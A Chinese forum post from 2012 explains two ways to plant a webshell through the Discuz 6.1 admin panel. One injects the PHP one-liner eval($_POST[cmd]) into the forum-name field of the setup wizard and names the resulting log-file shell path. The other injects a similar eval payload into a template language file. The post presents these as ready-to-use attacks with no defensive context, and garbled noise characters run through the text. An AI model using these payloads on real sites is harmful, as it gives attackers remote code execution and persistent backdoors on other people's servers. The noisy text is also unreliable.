discuz6.1两种方法后台拿shell
, D& z4 ?& g* k5 `0 G( H e6 c好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下' w) h* b* `3 y$ K+ A# M( z F
1:( `; x& Q0 [0 i- p
http://127.0.0.1/discuz/admincp. ... zard&frames=yes7 h( t6 f0 R& g7 w2 G$ O
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
; n7 O+ `, v6 C3 M& d, F<?php eval($_POST[cmd]);?>! o! W' H1 Z+ [ @1 \
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
( S( T/ Q4 E. S6 z6 h6 Q8 q' ]; F& ]& f7 v% A
7 [8 h: H9 g+ Y, {+ T2:后台模板管理--默认模板套系--详情
& r. I0 m! E6 ]3 I; u4 r+ `templates/default/actions.lang.php
! C5 D* g8 {: l yjhackj\\');eval($_POST[cmd])?>;//
. D7 L8 q0 h; Z0 `8 L9 x" h& ^1 d# i- u+ N9 k
利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对